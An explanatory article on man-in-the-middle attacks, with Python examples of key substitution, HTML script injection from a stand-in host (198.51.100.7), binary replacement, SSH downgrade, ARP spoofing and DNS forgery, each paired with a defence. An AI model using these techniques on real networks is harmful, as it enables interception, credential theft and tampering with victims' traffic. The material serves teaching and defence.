A man-in-the-middle (MITM) attack intercepts a communication between two systems. In an HTTP transaction, for example, the target is the TCP connection between client and server. Using various techniques, the attacker splits the original TCP connection into two new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy and can read, insert and modify the data in the intercepted communication.
Figure 1. Illustration of man-in-the-middle attack
The MITM attack is very effective against HTTP because the protocol and the data it carries are plain ASCII text. The attacker can therefore read and alter both the HTTP protocol itself and the data transferred over it: for example, capture a session cookie by reading the HTTP headers, or change the amount of a money transfer inside the application context, as shown in figure 2.
Figure 2. Illustration of an HTTP packet intercepted with Paros Proxy.
The MITM attack can also be carried out over an HTTPS connection using the same technique; the only difference is the establishment of two independent SSL/TLS sessions, one over each TCP connection. The browser sets up an SSL/TLS connection with the attacker, and the attacker establishes another SSL/TLS connection with the web server. Normally the browser warns the user that the certificate presented is not valid, but the user may click through the warning without understanding the threat. In some specific contexts the warning does not appear at all, for example when the server's private key has been compromised by the attacker, or when the attacker holds a certificate signed by a CA the browser trusts whose CN (or subject alternative name) matches the host name of the original web site.
MITM is not only an attack technique: the same interception is routinely used during web application development and for web vulnerability assessments.
MITM Attack tools
There are several tools for carrying out a MITM attack. They are particularly effective in LAN environments because they implement extra functionality, such as ARP spoofing, that permits interception of the traffic between hosts.
- Cain & Abel
MITM Proxy only tools
Proxy-only tools permit interaction with the parts of the HTTP protocol, such as the headers and body of a transaction, but have no capability to intercept the TCP connection between client and server. To get the traffic to the proxy, other network attack tools must be used or the browser must be configured to send its requests through it.
- OWASP WebScarab
- Paros Proxy
- Burp Proxy
- Odysseus Proxy
- Fiddler (by Microsoft)
A man-in-the-middle attack (MITM attack) is an attack in which the attacker intrudes into an existing connection between two endpoints on a network to intercept the exchanged data and inject false information. It involves eavesdropping on a connection, intruding into it, intercepting messages, and selectively modifying data.
- MITM attack is also known as:
- Bucket-brigade attack
- Fire brigade attack
- Monkey-in-the-middle attack
- Session hijacking
- TCP hijacking
- TCP session hijacking
- Name origin: the name "Man-in-the-Middle" comes from the ball game in which two players try to pass a ball to each other while a third player standing between them tries to seize it (hence also "monkey in the middle"). MITM attacks are sometimes referred to as "bucket brigade attacks" or "fire brigade attacks"; those names come from the fire brigade practice of putting out a fire by passing buckets from one person to the next between the water source and the fire.
In cryptography, the man-in-the-middle attack or bucket-brigade attack (often abbreviated MITM), sometimes Janus attack, is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection when in fact the entire conversation is controlled by the attacker.
A Man-in-the-Middle attack (MITM) is a type of attack in which an attacker gets between the sender and receiver of information and sniffs whatever is being sent.
- Man-in-the-middle attacks (MITM): attacks in which the attacker infiltrates the communication channel between two partners unnoticed and is thereby able to spy on or even modify their data exchanges.
Man-in-the-Middle attacks are often referred to as "session hijacking attacks", suggesting that the intruder aims to gain access to a legitimate user's session in order to tamper with it. The attack usually starts with sniffing and eavesdropping on a network stream, and ends with an attempt to alter, forge or reroute the intercepted data.
Man-in-the-Middle attacks are a classic threat to public-key cryptosystems whose key exchange is not authenticated. In such a scenario the attacker substitutes the intercepted public keys with forged keys of their own, and the victim parties are led to believe that they are still communicating securely with each other.
A common MITM scenario involves the attacker insinuating themselves into the communication between a client and a server. The attacker relays deceptive messages between client and server so that each believes it is talking safely to the other. Technically, the attacker runs a program that looks like the server to the client and like the client to the server.
The client/server scenario can be simply illustrated below:
Client |---Decrypt-->>|MITM attacker|---Recrypt-->>| Server
In a MITM attack the attacker tries to get between two target network endpoints and proxy all the communication between them. Once this succeeds, further attacks may include sniffing the passing packets, hijacking already authenticated sessions, injecting packets or commands towards the server, and sending forged responses to the victim client.
MITM attacks are chiefly aimed at sensitive and valuable information, and are frequently used to intercept both HTTP and HTTPS communications. A successful attacker must, however, first trick the target endpoint (the victim) into talking to the attacker's proxy instead of the real server.
One of the objectives for MITM attacks is to gain access to the client's messages and modify them before finally transmitting them to the server end. Other objectives of MITM can be to mislead the communicators at the client or server end, to intercept pertinent information (e.g., identity, address, password, or any other confidential information for malicious purposes) and also, at times, manipulate transactions.
MITM attacks are a common risk to web-based financial transaction systems, e.g. e-business websites, payment gateways, and online banking, insurance and credit card servicing platforms. MITM attacks may lead to identity theft and financial fraud.
Public Key Exchanging
In this scenario, a MITM attacker intercepts the public keys exchanged by the client and the server and substitutes keys of their own. To avoid arousing suspicion on either side, the attacker must also intercept every encrypted message and response and use the correct keys to decrypt and re-encrypt it on each segment of the communication, for every message. Though seemingly hard to accomplish, such attacks are a real risk on insecure networks (e.g. the Internet and wireless networks).
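The key substitution described above, with the decrypt-and-recrypt relay of the client/server diagram, worked through as an added example (not code from the original page or from any tool it names). It uses a toy Diffie-Hellman group (the prime 2**255 - 19 with generator 2, chosen for readability rather than a standardised group), a SHA-256 XOR stream as a stand-in for a real cipher, and the placeholder names Alice, Bob and Mallory; the defence shown is the out-of-band fingerprint comparison that SSH known_hosts and certificate pinning rely on.

```python
"""Unauthenticated Diffie-Hellman under a man-in-the-middle, and the
out-of-band fingerprint check that defeats it. Added example; the group and
cipher are toys chosen for readability (assumption, see lead-in)."""
import hashlib
import secrets

P = 2**255 - 19   # toy modulus (prime, fits in 32 bytes); use RFC 3526/7919 groups in practice
G = 2


def keypair():
    """Private exponent x and public value g^x mod p."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)


def shared_secret(priv, peer_pub):
    return pow(peer_pub, priv, P)


def fingerprint(pub):
    """SHA-256 of a public value, as published out of band (printed card, known_hosts, ...)."""
    return hashlib.sha256(pub.to_bytes(32, "big")).hexdigest()


def xor_stream(key, data):
    """Toy symmetric cipher keyed by the DH secret; stands in for AES-GCM or similar."""
    out, kb = bytearray(), key.to_bytes(32, "big")
    for block in range((len(data) + 31) // 32):
        ks = hashlib.sha256(kb + block.to_bytes(4, "big")).digest()
        chunk = data[block * 32:(block + 1) * 32]
        out += bytes(a ^ b for a, b in zip(chunk, ks))
    return bytes(out)


class Mallory:
    """Holds the two connections of figure 1, one towards each victim."""

    def __init__(self):
        self.priv, self.pub = keypair()
        self.captured = {}

    def relay_pubkey(self, sender, pub):
        """Intercept `sender`'s public value and forward Mallory's own instead."""
        self.captured[sender] = pub
        return self.pub

    def secret_with(self, party):
        return shared_secret(self.priv, self.captured[party])

    def relay_message(self, sender, receiver, ciphertext, rewrite):
        """Decrypt -> edit -> recrypt: the sender's key opens it, the receiver's key reseals it."""
        plaintext = xor_stream(self.secret_with(sender), ciphertext)
        return xor_stream(self.secret_with(receiver), rewrite(plaintext))


def honest_relay(sender, pub):
    return pub


def exchange(relay, verify_fingerprints):
    """Run one key exchange through `relay`; (alice_secret, bob_secret) or None on abort."""
    a, alice_pub = keypair()
    b, bob_pub = keypair()
    # Long-term fingerprints learned out of band, before anything crosses the wire.
    trusted = {"alice": fingerprint(alice_pub), "bob": fingerprint(bob_pub)}
    bob_pub_seen = relay("bob", bob_pub)        # what Alice receives
    alice_pub_seen = relay("alice", alice_pub)  # what Bob receives
    if verify_fingerprints and (fingerprint(bob_pub_seen) != trusted["bob"]
                                or fingerprint(alice_pub_seen) != trusted["alice"]):
        return None
    return shared_secret(a, bob_pub_seen), shared_secret(b, alice_pub_seen)


def demo():
    """Attack without fingerprint checks, then the same attack detected by them."""
    mallory = Mallory()
    k_alice, k_bob = exchange(mallory.relay_pubkey, verify_fingerprints=False)
    order = xor_stream(k_alice, b"TRANSFER 100 EUR TO ACCT 42")   # Alice -> Bob
    forged = mallory.relay_message("alice", "bob", order,
                                   lambda m: m.replace(b"100", b"900").replace(b"42", b"66"))
    return {
        "secrets_differ": k_alice != k_bob,
        "mallory_knows_both": (k_alice, k_bob) == (mallory.secret_with("alice"), mallory.secret_with("bob")),
        "bob_sees": xor_stream(k_bob, forged),
        "detected_with_fingerprints": exchange(Mallory().relay_pubkey, verify_fingerprints=True) is None,
    }


if __name__ == "__main__":
    print(demo())
```

Neither victim notices anything at the protocol level: each holds a perfectly valid shared secret, it is just shared with Mallory rather than with the other party. The fingerprint check works only because the fingerprints travelled over a channel Mallory does not control, which is exactly the role a trusted CA or a pre-distributed known_hosts entry plays.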
Command Injection
Command injection, an older class of injection attack, is chiefly used by MITM attackers to hijack an already authenticated session, inject commands to the server and emulate fake replies to the client.
Malicious Code Injection
MITM attackers can inject code into e-mail, SQL statements and web pages (i.e. SQL injection, HTML/script injection or cross-site scripting), and can even modify binary files while they are being downloaded, to plant a backdoor on victim clients or to alter the behaviour of the downloaded programs.
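The two edits just described, script injection into an intercepted HTML page and replacement of a downloaded binary, as they look from the proxy's side, together with the client-side integrity check that catches the second one. This is an added example, not code from the original page or from Paros, Burp or Ettercap; the request, responses and addresses are constructed, and the surrounding proxy (TCP interception and forwarding) is assumed to exist.

```python
"""Editing an intercepted HTTP transaction (added example; sample traffic is
constructed, the interception itself is assumed to be in place)."""
import hashlib

CRLF = b"\r\n"


def parse_message(raw):
    """Split an HTTP/1.x message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def build_message(start, headers, body):
    return CRLF.join([start] + [n + b": " + v for n, v in headers]) + CRLF + CRLF + body


def get_header(headers, name):
    return next((v for n, v in headers if n.lower() == name.lower()), None)


def set_header(headers, name, value):
    for i, (n, _) in enumerate(headers):
        if n.lower() == name.lower():
            headers[i] = (n, value)
            return
    headers.append((name, value))


def strip_compression(raw_request):
    """Attacker-side request edit: drop Accept-Encoding so the server answers in plaintext the proxy can edit."""
    start, headers, body = parse_message(raw_request)
    return build_message(start, [(n, v) for n, v in headers if n.lower() != b"accept-encoding"], body)


def inject_script(raw_response, script_tag):
    """Insert script_tag before </body> of an HTML response and fix Content-Length."""
    start, headers, body = parse_message(raw_response)
    ctype = get_header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html") or get_header(headers, b"Content-Encoding") \
            or get_header(headers, b"Transfer-Encoding"):
        return raw_response   # not HTML, compressed, or chunked: left untouched by this example
    idx = body.lower().rfind(b"</body>")
    body = body[:idx] + script_tag + body[idx:] if idx != -1 else body + script_tag
    set_header(headers, b"Content-Length", str(len(body)).encode())
    return build_message(start, headers, body)


def replace_body(raw_response, new_body):
    """Swap the body of a download (e.g. an installer) for attacker-supplied bytes."""
    start, headers, _ = parse_message(raw_response)
    set_header(headers, b"Content-Length", str(len(new_body)).encode())
    return build_message(start, headers, new_body)


def verify_download(raw_response, expected_sha256_hex):
    """Client-side defence: compare the body with a digest obtained out of band, never from the same channel."""
    return hashlib.sha256(parse_message(raw_response)[2]).hexdigest() == expected_sha256_hex


# Constructed sample traffic.
CLIENT_REQUEST = (b"GET /index.html HTTP/1.1" + CRLF + b"Host: www.example.com" + CRLF
                  + b"Accept-Encoding: gzip, deflate" + CRLF + CRLF)
HTML_BODY = b"<html><body><h1>Welcome</h1></body></html>"
HTML_RESPONSE = (b"HTTP/1.1 200 OK" + CRLF + b"Content-Type: text/html; charset=utf-8" + CRLF
                 + b"Content-Length: " + str(len(HTML_BODY)).encode() + CRLF + CRLF + HTML_BODY)
TOOL_BODY = b"\x7fELF...original-installer..."
TOOL_RESPONSE = (b"HTTP/1.1 200 OK" + CRLF + b"Content-Type: application/octet-stream" + CRLF
                 + b"Content-Length: " + str(len(TOOL_BODY)).encode() + CRLF + CRLF + TOOL_BODY)
TOOL_SHA256 = hashlib.sha256(TOOL_BODY).hexdigest()   # what the vendor publishes out of band


def demo():
    injected = inject_script(HTML_RESPONSE, b"<script src='http://198.51.100.7/s.js'></script>")
    trojaned = replace_body(TOOL_RESPONSE, b"\x7fELF...backdoored...")
    return {
        "request_without_encoding": strip_compression(CLIENT_REQUEST),
        "injected": injected,
        "trojaned": trojaned,
        "original_verifies": verify_download(TOOL_RESPONSE, TOOL_SHA256),
        "trojaned_verifies": verify_download(trojaned, TOOL_SHA256),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The Content-Length fix-up is what keeps the client from noticing anything: a body edit that leaves the header stale produces a truncated or hanging download, which is how sloppy tampering gets caught. A checksum published on the same web page, fetched over the same intercepted connection, gives no protection because the attacker rewrites it along with the file; it must come via a signature or a separate channel.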
Downgrade Attacks - SSH V2 to V1
Alberto Ornaghi and Marco Valleri observe that MITM attackers may manage to change the parameters exchanged between the target endpoints (e.g. server and client) at the start of their connection. According to their presentation at Black Hat Europe 2003, the MITM attacker may "force the client to initialize a SSH1 connection instead of SSH2" via a filter that substitutes the SSH v1 banner version "1.51" for the "1.99" advertised by a server that supports both versions. Ornaghi and Valleri classify such scenarios as "Parameters and Banners Substitution."
- Downgrade Attacks: the term refers to an attack that forces the victims to use less secure features, functions or protocols that remain supported for backward-compatibility reasons. The downgrade attacks described here cover SSH (Secure Shell), IPsec (Internet Protocol Security) and PPTP (Point-to-Point Tunneling Protocol).
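The banner substitution above, and the client-side policy that defeats it, as an added example (not code from the original page or from Ettercap's filter language). The banners are constructed and the software version strings are illustrative; the client preference tuple mirrors the old OpenSSH `Protocol 2,1` versus `Protocol 2` setting.

```python
"""SSH identification-string substitution (1.99 -> 1.51) and the client
policy that refuses the downgrade. Added example with constructed banners."""
import re

BANNER = re.compile(rb"^SSH-(\d+)\.(\d+)-([^\s]+)")


def parse_banner(line):
    """Return (major, minor, software) from an identification string such as SSH-2.0-OpenSSH_9.6."""
    m = BANNER.match(line)
    if not m:
        raise ValueError("not an SSH identification string: %r" % line)
    return int(m.group(1)), int(m.group(2)), m.group(3)


def server_versions(banner):
    """Protocol versions a server offers; 1.99 means both 1 and 2 (RFC 4253, section 5.1)."""
    major, minor, _ = parse_banner(banner)
    if (major, minor) == (1, 99):
        return {1, 2}
    return {major}


def downgrade_filter(banner):
    """The attacker's in-line filter: make a dual-version server look v1-only."""
    return banner.replace(b"SSH-1.99-", b"SSH-1.51-", 1)


def negotiate(server_banner, client_preference):
    """First version in client_preference the server offers; None means the client aborts."""
    offered = server_versions(server_banner)
    for version in client_preference:
        if version in offered:
            return version
    return None


REAL_BANNER = b"SSH-1.99-OpenSSH_3.4p1"   # constructed: a server still speaking v1 and v2


def demo():
    seen = downgrade_filter(REAL_BANNER)
    return {
        "seen_by_client": seen,
        "permissive_client": negotiate(seen, (2, 1)),   # silently falls back to SSH-1
        "strict_client": negotiate(seen, (2,)),          # aborts instead
        "without_attacker": negotiate(REAL_BANNER, (2, 1)),
    }


if __name__ == "__main__":
    print(demo())
```

In SSH-2 both identification strings are fed into the exchange hash (RFC 4253, section 8), so a tampered banner makes the key exchange fail; the downgrade only works because SSH-1 has no such protection and the client is willing to speak it. Refusing protocol 1 altogether is the fix, and OpenSSH removed protocol 1 support entirely in version 7.6.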
Downgrade Attacks - IPSEC Failure
MITM attackers may block the IKE key exchange on UDP port 500 so that each victim concludes that the other side cannot start an IPsec connection. If the victim host is configured to fall back to clear text when IPsec negotiation fails, the traffic then flows unencrypted without anyone noticing.
Downgrade Attacks - PPTP
During the protocol negotiation at the beginning of a PPTP session, MITM attackers may force the victims to use the less secure PAP authentication, MS-CHAP v1 (i.e. downgrading from MS-CHAP v2), or even no encryption at all.
Attackers can also force re-negotiation (the Terminate-Ack packet is sent in clear text), steal passwords from existing tunnels, and repeat previous attacks.
Attackers can compel a "password change" to obtain password hashes that can be used directly by a modified SMB or PPTP client. MS-CHAP v1 hashes can also be forced.
- PPTP: PPTP (Point-to-Point Tunneling Protocol) is a protocol for VPN implementation. Microsoft MS-CHAP v2 or EAP-TLS is used to authenticate PPTP connections. EAP-TLS (Extensible Authentication Protocol-Transport Layer Security) is certificate based, and thus a safer option for PPTP than MS-CHAP v2.
The techniques used for MITM attacks can be classified according to the following two network environment types:
- Local Area Network
- From Local To Remote (through a gateway)
Local Area Network
- ARP spoofing
- Briefing: ARP (Address Resolution Protocol) spoofing is also known as "ARP poisoning" or ARP poison routing. The attacker sends forged ARP replies to corrupt the ARP caches of hosts on the same broadcast domain, so that the victim's IP address is mapped to the attacker's MAC address; frames destined for the victim are then delivered to the attacker, who can sniff and modify them before forwarding.
- Tools used:
- ARPoison is a UNIX Command-line tool that can be used to create spoofed ARP packets.
- Ettercap can be used for filtering, hijacking, poisoning and sniffing, including SSH v1 sniffing (transparent attack).
- Dsniff can be used for poisoning and sniffing, including SSH v1 sniffing (proxy attack).
- Parasite is a daemon used to watch a LAN for ARP requests and automatically send spoofed ARP replies.
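What such a forged reply looks like on the wire, and the detection that arpwatch-style tools perform on it, as an added example (not code from the original page or from ARPoison, Ettercap, Dsniff or Parasite). The MAC and IP addresses are constructed; the frames are only built as bytes here, since sending them needs a raw socket with CAP_NET_RAW and is deliberately left out.

```python
"""Spoofed ARP reply construction and poisoning detection (added example;
addresses are constructed, frames are built but never sent)."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying the ARP reply 'sender_ip is at sender_mac', unicast to the target."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not an IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


class ArpWatch:
    """Remember the MAC each IP has claimed; flag any reply that changes it."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.get(ip)
        if known is not None and known != mac:
            self.alerts.append("%s changed from %s to %s" % (ip, known, mac))
        self.table[ip] = mac


GATEWAY = ("00:11:22:33:44:01", "192.168.1.1")      # constructed addresses
VICTIM = ("00:11:22:33:44:02", "192.168.1.20")
ATTACKER_MAC = "de:ad:be:ef:00:01"


def demo():
    """Two legitimate replies, then the poisoning pair that puts the attacker between victim and gateway."""
    frames = [
        build_arp_reply(*GATEWAY, *VICTIM),
        build_arp_reply(*VICTIM, *GATEWAY),
        build_arp_reply(ATTACKER_MAC, GATEWAY[1], *VICTIM),   # to the victim: "gateway is at attacker"
        build_arp_reply(ATTACKER_MAC, VICTIM[1], *GATEWAY),   # to the gateway: "victim is at attacker"
    ]
    watch = ArpWatch()
    for frame in frames:
        watch.observe(frame)
    return watch


if __name__ == "__main__":
    print(demo().alerts)
```

Both poisoned directions are needed for a full MITM; poisoning only the victim gives the attacker the outbound half and breaks the connection unless IP forwarding is enabled on the attacking host. The detector is the same idea as static ARP entries or dynamic ARP inspection on the switch: an IP-to-MAC binding should not flip without a DHCP event.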
- DNS spoofing
- Briefing: The attacker sniffs the transaction ID of the victim's DNS request and sends a forged reply bearing that ID before the real DNS server answers.
- Tools used:
- ADM DNS spoofing tools can spoof DNS packets via various active and passive methods.
- Ettercap (Plugin needed: phantom plugin)
- Dsniff (dnsspoof)
- Zodiac can be used for DNS name server versioning, DNS local spoofing (answering DNS queries before the remote name server), DNS jizz spoofing, and DNS ID spoofing.
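The ID-spoofing race described above, as an added example (not code from the original page or from dnsspoof, ADM or Zodiac): a forged A-record response built to match a sniffed or predicted transaction ID, and the checks a resolver applies before accepting an answer. Names, addresses and ports are constructed; the hardened case uses the random transaction ID and random source port that RFC 5452 recommends.

```python
"""DNS ID spoofing and resolver-side acceptance checks (added example;
names, addresses and ports are constructed)."""
import secrets
import socket
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def decode_name(pkt, off):
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, jumped, end = [], False, None
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:                     # compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length].decode())
        off += length
    return ".".join(labels), (end if jumped else off)


def build_query(txid, name):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_answer(txid, name, ip, ttl=300):
    """Response with one A record; the answer's owner name is a pointer to the question."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def accept_answer(query, query_port, response, response_port):
    """Resolver checks: same UDP port, same ID, same question; returns the A record or None."""
    if response_port != query_port:
        return None
    q_id = struct.unpack("!H", query[:2])[0]
    r_id, flags, qd, an = struct.unpack("!HHHH", response[:8])
    if r_id != q_id or not flags & 0x8000 or qd != 1 or an < 1:
        return None
    q_name, _ = decode_name(query, 12)
    r_name, off = decode_name(response, 12)
    if r_name.lower() != q_name.lower():
        return None
    off += 4                                          # skip QTYPE and QCLASS
    _, off = decode_name(response, off)
    rtype, rclass, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    if (rtype, rclass, rdlen) != (TYPE_A, CLASS_IN, 4):
        return None
    return socket.inet_ntoa(response[off + 10:off + 14])


def demo():
    """A predictable ID and fixed port let the forgery win; random ID and port leave a blind guess no chance."""
    name, attacker_ip, real_ip = "www.example.com", "198.51.100.7", "93.184.216.34"
    weak_query = build_query(0x1234, name)                 # sequential ID, source port 53
    forged = build_answer(0x1234, name, attacker_ip)       # attacker sniffed or predicted 0x1234
    rnd_id, rnd_port = secrets.randbelow(65536), 1024 + secrets.randbelow(64511)
    hardened_query = build_query(rnd_id, name)
    return {
        "weak_accepts_forgery": accept_answer(weak_query, 53, forged, 53),
        "hardened_rejects_guess": accept_answer(hardened_query, rnd_port, forged, 53),
        "hardened_accepts_real": accept_answer(hardened_query, rnd_port,
                                               build_answer(rnd_id, name, real_ip), rnd_port),
        "wrong_name_rejected": accept_answer(weak_query, 53,
                                             build_answer(0x1234, "evil.example", attacker_ip), 53),
    }


if __name__ == "__main__":
    print(demo())
```

Randomising the ID and source port only raises the cost of a blind guess; an attacker who can sniff the query on the LAN still sees both values and wins the race, which is why on a LAN the ARP poisoning above is usually the first step. DNSSEC validation, or TLS on the application above DNS, is what stops a sniffing attacker.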
- IP address spoofing
- Briefing: The attacker creates IP packets with a forged source address in order to conceal the sender's identity or to impersonate another system. (Against a remote system this is hard, because the attacker never sees the replies and must predict the state of the connection packet by packet; the technique is most effective where trust relationships based on source address exist between endpoints.)
- Tools used:
- Hping can craft spoofed IP datagrams from a one-line command and send them to almost any target.
- Spoofed IP
- Port stealing
- Briefing: "Port stealing" refers to the MITM technique of poisoning the switch forwarding database (FDB) to usurp the victim host's switch port for packet sniffing on layer 2 switched networks. The attacker floods the switch with forged ARP frames whose source MAC address is the victim's and whose destination MAC address is the attacker's own; such frames are not seen by other hosts on the network. Because the victim also sends frames at the same time, the switch sees the same source MAC address arriving on two different ports and keeps re-binding the address to whichever port it last saw it on. If the attacker's frames are faster, the switch delivers frames intended for the victim to the attacker. The attacker sniffs a received frame, stops flooding and sends an ARP request for the victim's IP address; once the victim's ARP reply has restored the correct binding, the attacker forwards the "stolen" frame to the victim. The flooding then starts again for the next cycle.
- Tools used:
- Ettercap (Plugin needed: Confusion plugin)
- STP mangling
- Briefing: STP (Spanning Tree Protocol) mangling refers to the technique by which the attacker's host gets itself elected as the new root bridge of the spanning tree. The attacker either forges configuration BPDUs (Bridge Protocol Data Units) advertising a bridge ID lower, i.e. more preferred, than the current root's, or broadcasts STP Configuration/Topology Change BPDUs, to force a re-election in which the attacker's host becomes the root bridge. As root bridge, the attacker sits on the forwarding path of most of the traffic in the switched network.
- Tools used:
- Ettercap (Plugin needed: Lamia plugin)
From Local To Remote (through a gateway)
- ARP poisoning
- DNS spoofing
- DHCP spoofing (e.g. spoofing the DHCP server): the attacker answers clients' DHCP requests with forged leases whose default gateway or DNS server address points to the attacker
- Gateway spoofing (usually, spoofing the default gateway)
- ICMP redirection
- IRDP spoofing - route mangling
- DNS poisoning
- Route mangling
- Traffic tunneling
The following tools are commonly used for launching, detecting or testing MITM attacks.
- Tool Name: Ettercap
- Current Version: NG-0.7.3 (Release Date: May 29, 2005)
- Developer: Alberto Ornaghi, Marco Valleri
- Platforms:
- FreeBSD 4.x, 5.x;
- Linux 2.0.x, 2.2.x, 2.4.x, 2.6.x;
- Microsoft Windows 2000/XP/2003;
- NetBSD 1.5;
- OpenBSD 2.x, 3.x;
- OS X (darwin 6.x, 7.x);
- Solaris 2.x.
- Commercial or Freeware: Freeware
- URL: ettercap.sourceforge.net
- Briefing: Ettercap is a multipurpose suite for MITM attacks in switched LAN environments. As a LAN-based sniffer, interceptor and logger, its main features are sniffing of live connections and content filtering on the fly. It supports active and passive dissection of many protocols (including encrypted ones) and includes functionality for network and host analysis. Ettercap can be used to launch a MITM attack via ARP poisoning or port stealing.
- Tool Name: Dsniff
- Current Version: 2.3 (Release Date: December 19, 2000)
- Developer: Dug Song
- Platforms:
- OpenBSD (i386);
- Redhat Linux (i386);
- Solaris (sparc).
- Commercial or Freeware: Freeware
- URL: www.monkey.org/~dugsong/dsniff
- Briefing: Dsniff is described as a tool suite for network auditing and penetration testing, but an attacker can use it for SSL MITM attacks. Its components dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy passively monitor a network for sensitive data (e-mail, files and passwords). Its other components arpspoof, dnsspoof and macof allow the attacker to intercept network traffic that would normally not reach them. Its components sshmitm and webmitm implement active man-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
- Tool Name: Yersinia
- Current Version: 0.7.1 (Release Date: May 8, 2007)
- Developer: Alfredo Andrés Omella (Slay), David Barroso Berrueta (tomac)
- Platforms:
- Linux 2.4.x and 2.6.x;
- Mac OSX 10.4 Tiger (Intel);
- OpenBSD 3.4 (note: upgrade your pcap libraries to at least 0.7.2);
- Solaris 5.8 64bits SPARC.
- Commercial or Freeware: Freeware
- URL: www.yersinia.net
- Briefing: Yersinia takes its name from the bacterium Yersinia pestis. It exploits weaknesses in the following layer 2 protocols: STP, CDP, DTP, DHCP, HSRP, IEEE 802.1Q, IEEE 802.1X, ISL (Inter-Switch Link) and VTP (VLAN Trunking Protocol).
FOLLOW-UP: RISK SHEET
|AUTHENTICATION SOLUTION|MITM RISKS|RISK LEVEL|
|EAP-MD5|On public Ethernets or wireless LANs, station identities and password hashes can easily be sniffed. EAP-MD5 provides neither mutual authentication nor authentication of the EAP server, so a MITM attacker can pose as an access point and trick legitimate users into authenticating to the rogue AP.||
|EAP-TTLS|Systems protected by EAP-TTLS remain vulnerable to MITM attacks because user passwords are more easily guessed, shared or disclosed through social engineering than client-side certificates; a supplicant that does not validate the server certificate will also build its TLS tunnel to a rogue AP.||
|LEAP|Systems protected by LEAP remain vulnerable to MITM attacks.||
|PEAP|Systems protected by PEAP remain vulnerable to MITM attacks, in particular when the supplicant does not validate the server certificate and so terminates its tunnel at a rogue AP.||
|Key fobs and one-time password (OTP) tokens|Token-based and smart-card-based OTP systems are vulnerable to MITM attacks: attackers may hijack online sessions by tricking legitimate users into submitting the one-time PINs produced by their tokens or smart cards.|MEDIUM|
||Credentials can sometimes be stolen in a MITM attack using a proxy server.|LOW|
- EAP: Extensible Authentication Protocol
- LEAP: Lightweight Extensible Authentication Protocol
- PEAP: Protected Extensible Authentication Protocol
- TTLS: Tunneled Transport Layer Security